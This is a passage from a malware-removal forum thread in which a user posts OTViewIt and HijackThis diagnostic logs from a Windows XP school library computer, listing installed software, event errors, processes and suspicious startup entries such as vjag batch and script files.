[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2006/10/26 13:45:02 | 00,873,216 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll (ms-help:{314111c7-a502-11d2-bbca-00c04f8ec294} (HKLM) [HxProtocol Class])

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2007/05/10 13:45:34 | 08,069,464 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Web Components\11\OWC11.DLL (mso-offdap11:{32505114-5902-49B2-880A-1F7738E5A384} (HKLM) [Data Page Plugable Protocal mso-offdap11 Handler])

========== (O18) Protocol Filters ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\] - Protocol Filters
[2006/10/26 21:41:48 | 00,044,344 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSOXMLMF.DLL text/xml:{807563E5-5146-11D5-A672-00B0D022E945} (HKLM) [Microsoft Office InfoPath XML Mime Filter]

========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{02DFF6B1-1654-411C-8D7B-FD6052EF016F}"=Apple Software Update
"{034759DA-E21A-4795-BFB3-C66D17FAD183}"=Sophos Anti-Virus
"{08786A53-D98F-484A-867C-3302BC5AE30D}"=Digital Blue QX5 Microscope
"{08CA9554-B5FE-4313-938F-D4A417B81175}"=QuickTime
"{15C418EB-7675-42be-B2B3-281952DA014D}"=Sophos AutoUpdate
"{2348B97D-C991-438F-BC44-294C931E7B8B}"=SMART Essentials for Educators
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}"=Java™ 6 Update 13
"{281ECE39-F043-492B-8337-F2E546B5604A}"=PowerDVD
"{2AFFFDD7-ED85-4A90-8C52-5DA9EBDC9B8F}"=Microsoft SQL Server 2005 Express Edition (MSSMLBIZ)
"{2BA00471-0328-3743-93BD-FA813353A783}"=Microsoft .NET Framework 3.0 Service Pack 1
"{30465B6C-B53F-49A1-9EBA-A3F187AD502E}"=Sonic Update Manager
"{3248F0A8-6813-11D6-A77B-00B0D0160050}"=Java™ 6 Update 5
"{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}"=WebFldrs XP
"{353D20CC-719B-4A60-AD33-D03F88C10330}"=Microsoft Office Accounting PayPal Addin
"{44734179-8A79-4DEE-BB08-73037F065543}"=Apple Mobile Device Support
"{46486451-E60F-42C3-92D7-796D8594688A}"=SMART Board Software
"{46614A49-222A-48EF-87A9-BFD603E608E1}"=Microsoft Office Accounting Fixed Asset Manager
"{47BF1BD6-DCAC-468F-A0AD-E5DECC2211C3}"=Bonjour
"{50120000-1105-0000-0000-0000000FF1CE}"=Microsoft Office 2007 Primary Interop Assemblies
"{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}"=Microsoft SQL Server Setup Support Files (English)
"{56B4002F-671C-49F4-984C-C760FE3806B5}"=Microsoft SQL Server VSS Writer
"{585776BC-4BD6-4BD2-A19A-1D6CB44A403B}"=iTunes
"{5EE30018-CB99-464D-903D-F794592F503B}"=Lightspeed Systems User Agent v2.00.00
"{5FA793A6-0071-42C1-9355-8F69A428C44F}"=Microsoft Office Accounting ADP Payroll Addin
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}"=Microsoft Silverlight
"{8A708DD8-A5E6-11D4-A706-000629E95E20}"=Intel® Graphics Media Accelerator Driver
"{8C711818-076E-475C-B95B-DF11CD9D8DBE}"=Microsoft Office Accounting Equifax Addin
"{90120000-0010-0409-0000-0000000FF1CE}"=Microsoft Software Update for Web Folders (English) 12
"{90120000-0015-0409-0000-0000000FF1CE}"=Microsoft Office Access MUI (English) 2007
"{90120000-0015-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0016-0409-0000-0000000FF1CE}"=Microsoft Office Excel MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0018-0409-0000-0000000FF1CE}"=Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0019-0409-0000-0000000FF1CE}"=Microsoft Office Publisher MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001A-0409-0000-0000000FF1CE}"=Microsoft Office Outlook MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001B-0409-0000-0000000FF1CE}"=Microsoft Office Word MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0409-0000-0000000FF1CE}"=Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_PROHYBRIDR_{3EC77D26-799B-4CD8-914F-C1565E796173}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-040C-0000-0000000FF1CE}"=Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_PROHYBRIDR_{430971B1-C31E-45DA-81E0-72C095BAB72C}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0C0A-0000-0000000FF1CE}"=Microsoft Office Proof (Spanish) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}_PROHYBRIDR_{F7A31780-33C4-4E39-951A-5EC9B91D7BF1}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-002C-0409-0000-0000000FF1CE}"=Microsoft Office Proofing (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}"=Microsoft Office Shared MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0115-0409-0000-0000000FF1CE}"=Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0117-0409-0000-0000000FF1CE}"=Microsoft Office Access Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90A40409-6000-11D3-8CFE-0150048383C9}"=Microsoft Office 2003 Web Components
"{91120000-0031-0000-0000-0000000FF1CE}"=Microsoft Office Professional Hybrid 2007
"{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{A06275F4-324B-4E85-95E6-87B2CD729401}"=Windows Defender
"{A939D341-5A04-4E0A-BB55-3E65B386432D}"=Microsoft Office Small Business Connectivity Components
"{AC76BA86-7AD7-1033-7B44-A81200000003}"=Adobe Reader 8.1.2
"{B0717D5A-1976-482B-9ADF-F19631A541A4}"=Microsoft Office Accounting 2007
"{B32C4059-6E7A-41EF-AD20-56DF1872B923}"=Business Contact Manager for Outlook 2007 SP1
"{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1"=Spybot - Search & Destroy
"{B508B3F1-A24A-32C0-B310-85786919EF28}"=Microsoft .NET Framework 2.0 Service Pack 1
"{B7F54262-AB66-44B3-88BF-9FC69941B643}"=Broadcom Gigabit Integrated Controller
"{BAF78226-3200-4DB4-BE33-4D922A799840}"=Windows Presentation Foundation
"{BD68F46D-8A82-4664-8E68-F87C55BDEFD4}"=Microsoft SQL Server Native Client
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}"=Microsoft .NET Framework 1.1
"{F0A37341-D692-11D4-A984-009027EC0A9C}"=SoundMAX
"{FCD9CD52-7222-4672-94A0-A722BA702FD0}"=Dell Resource CD
"{FF11005D-CBC8-45D5-A288-25C7BB304121}"=Sophos Remote Management System
"{FF9278B4-1A52-4E18-A668-E9F2219F5798}"=Classroom Performance System
"9C7E96126D886BC04FAA6ABAD9312271DB76E1F1"=Windows Driver Package - Digital Blue (marsqx5) Image (04/04/2007 1.0.0.0)
"Adobe Flash Player ActiveX"=Adobe Flash Player ActiveX
"Adobe Shockwave Player"=Adobe Shockwave Player 11
"Ask Toolbar_is1"=Ask Toolbar
"Business Contact Manager"=Business Contact Manager for Outlook 2007 SP1
"Dell_HostCD"=Dell Software Uninstall
"ePatLauncher"=ePatLauncher
"IDNMitigationAPIs"=Microsoft Internationalized Domain Names Mitigation APIs
"InstallShield_{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"Lotus Notes"=Lotus Notes
"Microsoft .NET Framework 1.1 (1033)"=Microsoft .NET Framework 1.1
"Microsoft Office Accounting 2007"=Microsoft Office Accounting 2007
"Microsoft SQL Server 2005"=Microsoft SQL Server 2005
"MSCompPackV1"=Microsoft Compression Client Pack 1.0 for Windows XP
"NLSDownlevelMapping"=Microsoft National Language Support Downlevel APIs
"PROHYBRIDR"=2007 Microsoft Office system
"TestNav"=TestNav
"WIC"=Windows Imaging Component
"Windows Media Format Runtime"=Windows Media Format 11 runtime
"Windows Media Player"=Windows Media Player 11
"Windows XP Service Pack"=Windows XP Service Pack 3
"WMFDist11"=Windows Media Format 11 runtime
"wmp11"=Windows Media Player 11
"Wudf01000"=Microsoft User-Mode Driver Framework Feature Pack 1.0
"XpsEPSC"=XML Paper Specification Shared Components Pack 1.0

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 3/30/2009 5:00:43 PM | Computer Name = 103_LIB_S3 | Source = MPSampleSubmission | ID = 5000
Description = EventType mptelemetry, P1 80072efd, P2 endsearch, P3 search, P4 1.1.1593.0,
P5 mpsigdwn.dll, P6 1.1.1593.0, P7 windows defender, P8 NIL, P9 NIL, P10 NIL.

Error - 3/31/2009 1:00:18 PM | Computer Name = 103_LIB_S3 | Source = MPSampleSubmission | ID = 5000
Description = EventType mptelemetry, P1 80072efd, P2 endsearch, P3 search, P4 1.1.1593.0,
P5 mpsigdwn.dll, P6 1.1.1593.0, P7 windows defender, P8 NIL, P9 NIL, P10 NIL.

[ System Events ]
Error - 1/10/2009 1:52:06 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/10/2009 3:25:08 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/18/2009 5:03:41 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/21/2009 6:16:21 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/21/2009 7:17:08 PM | Computer Name = 103_LIB_S3 | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
103_COUNSELOR that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{346168FD-2809-. The master browser is stopping or an election is being
forced.

Error - 1/23/2009 3:20:09 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 2/2/2009 9:43:29 AM | Computer Name = 103_LIB_S3 | Source = Windows Update Agent | ID = 16
Description = Unable to Connect: Windows is unable to connect to the automatic updates
service and therefore cannot download and install updates according to the set
schedule. Windows will continue to try to establish a connection.

Error - 2/4/2009 9:43:30 AM | Computer Name = 103_LIB_S3 | Source = Windows Update Agent | ID = 16
Description = Unable to Connect: Windows is unable to connect to the automatic updates
service and therefore cannot download and install updates according to the set
schedule. Windows will continue to try to establish a connection.

Error - 3/20/2009 9:55:57 AM | Computer Name = 103_LIB_S3 | Source = SAVOnAccessFilter | ID = 3997759
Description = Failed to obtain volume information from mount manager.

Error - 3/31/2009 5:16:46 PM | Computer Name = 103_LIB_S3 | Source = Dhcp | ID = 1002
Description = The IP address lease 10.138.25.172 for the Network Card with network
address 00137217D6AA has been denied by the DHCP server 10.138.8.6 (The DHCP Server
sent a DHCPNACK message).


< End of report >


Hijackthis
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 2:59:42 PM, on 4/2/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
C:\Program Files\Sophos\Remote Management System\RouterNT.exe
c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Sophos\AutoUpdate\ALMon.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\System32\cmd.exe
C:\WINDOWS\system32\xcopy.exe
C:\HiJackThis.exe.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.vview.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://go.microsoft.com/fwlink/?LinkId=74005
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: AskBar BHO - {201f27d4-3704-41d6-89c1-aa35e39143ed} - C:\Program Files\AskBarDis\bar\bin\askBar.dll
O2 - BHO: Sophos Web Content Scanner - {39EA7695-B3F2-4C44-A4BC-297ADA8FD235} - C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SMART Notebook Download Plugin - {67BCF957-85FC-4036-8DC4-D4D80E00A77B} - C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll
O2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Ask Toolbar - {3041d03e-fd4b-44e0-b742-2d9b88305f98} - C:\Program Files\AskBarDis\bar\bin\askBar.dll
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe"
O4 - HKLM\..\Run: [vjag] C:\WINDOWS\system32\auto\vjag3.bat
O4 - HKLM\..\Run: [vjag2] C:\WINDOWS\system32\auto\vjag.vbs
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKUS\S-1-5-21-3925025582-4110435278-4136060888-1115\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe (User 'tme')
O4 - HKUS\S-1-5-18\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')
O4 - Global Startup: AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
O4 - Global Startup: SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windowsupd...b?1207692023140
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = vview.edu
O17 - HKLM\Software\..\Telephony: DomainName = vview.edu
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = vview.edu
O20 - AppInit_DLLs: C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: dkab_device - Unknown owner - C:\WINDOWS\system32\DKabcoms.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Sophos Anti-Virus status reporter (SAVAdminService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
O23 - Service: Sophos Anti-Virus (SAVService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
O23 - Service: SMART Board Service - SMART Technologies Inc. - C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
O23 - Service: SMART Web Server - Unknown owner - C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe
O23 - Service: Sophos Agent - Sophos Plc - C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
O23 - Service: Sophos AutoUpdate Service - Sophos Plc - C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
O23 - Service: Sophos Device Control Service - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
O23 - Service: Sophos Message Router - Sophos Plc - C:\Program Files\Sophos\Remote Management System\RouterNT.exe
O23 - Service: User Agent Service (UAService) - Lightspeed Systems - C:\Program Files\Lightspeed Systems\User Agent\UAService.exe

--
End of file - 9210 bytes

#9 nightjar59

nightjar59
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:10:36 AM

Posted 02 April 2009 - 03:11 PM

Here we go again with hidden folders......

OTViewIT
OTViewIt logfile created on: 4/2/2009 3:05:50 PM - Run 2
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\administrator.VVIEW\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1.99 Gb Total Physical Memory | 1.43 Gb Available Physical Memory | 71.78% Memory free
3.84 Gb Paging File | 3.37 Gb Available in Paging File | 87.82% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 74.50 Gb Total Space | 61.36 Gb Free Space | 82.36% Space Free | Partition Type: NTFS
Drive D: | 64.77 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 103_LIB_S3
Current User Name: Administrator
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== Processes ==========

[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe
[2008/09/24 15:52:08 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe
[2009/03/09 05:19:15 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
[2008/10/27 09:14:03 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
[2009/04/02 05:00:20 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
[2009/01/28 07:24:29 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
[2009/04/02 05:00:16 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
[2008/08/07 14:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
[2009/04/02 05:00:33 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
[2008/11/24 22:31:10 | 29,263,712 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
[2004/10/14 14:42:54 | 01,404,928 | ---- | M] (Analog Devices, Inc.) -- C:\Program Files\Analog Devices\Core\smax4pnp.exe
[2005/10/14 14:46:34 | 00,077,824 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\hkcmd.exe
[2005/10/14 14:50:30 | 00,114,688 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\igfxpers.exe
[2006/11/03 19:20:12 | 00,866,584 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MSASCui.exe
[2008/03/30 10:36:40 | 00,267,048 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunesHelper.exe
[2004/07/27 16:50:18 | 00,081,920 | ---- | M] (InstallShield Software Corporation) -- C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
[2006/10/20 17:23:38 | 00,118,784 | ---- | M] (CyberLink Corp.) -- C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
[2008/05/08 06:24:44 | 00,155,648 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\wscript.exe
[2009/03/09 05:19:17 | 00,148,888 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jusched.exe
[2009/03/05 16:07:20 | 02,260,480 | RHS- | M] (Safer-Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
[2009/01/28 07:24:29 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALMon.exe
